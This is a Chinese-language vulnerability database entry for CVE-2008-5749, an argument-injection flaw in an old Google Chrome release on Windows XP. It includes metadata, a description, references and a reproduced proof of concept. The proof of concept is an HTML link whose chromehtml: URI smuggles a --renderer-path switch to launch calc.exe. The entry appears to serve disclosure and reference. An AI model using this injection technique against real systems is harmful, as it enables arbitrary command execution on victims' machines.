Google Chrome 自变量注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117119 漏洞类型 代码注入
发布时间 2008-12-23 更新时间 2009-01-29
CVE编号 CVE-2008-5749 CNNVD-ID CNNVD-200812-471
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7566
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-471
|漏洞详情
谷歌浏览器(GoogleChrome)是一款可让您更快速、轻松且安全地使用网络的浏览器。WindowsXPSP3的GoogleChrome1.0.154.36中存在自变量注入漏洞。远程攻击者可以借助一个chromehtml:URI的--renderer-path选项,执行任意指令。
|漏洞EXP
<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

# milw0rm.com [2008-12-23]
|参考资料

来源:BID
名称:32997
链接:http://www.securityfocus.com/bid/32997
来源:BUGTRAQ
名称:20081225Re:GoogleChromeBrowser(ChromeHTML://)remoteparameterinjectionPOC
链接:http://www.securityfocus.com/archive/1/archive/1/499581/100/0/threaded
来源:BUGTRAQ
名称:20081223GoogleChromeBrowser(ChromeHTML://)remoteparameterinjectionPOC
链接:http://www.securityfocus.com/archive/1/archive/1/499570/100/0/threaded
来源:MILW0RM
名称:7566
链接:http://www.milw0rm.com/exploits/7566
来源:SREASON
名称:4821
链接:http://securityreason.com/securityalert/4821
来源:MISC
链接:http://retrogod.altervista.org/9sg_chrome.html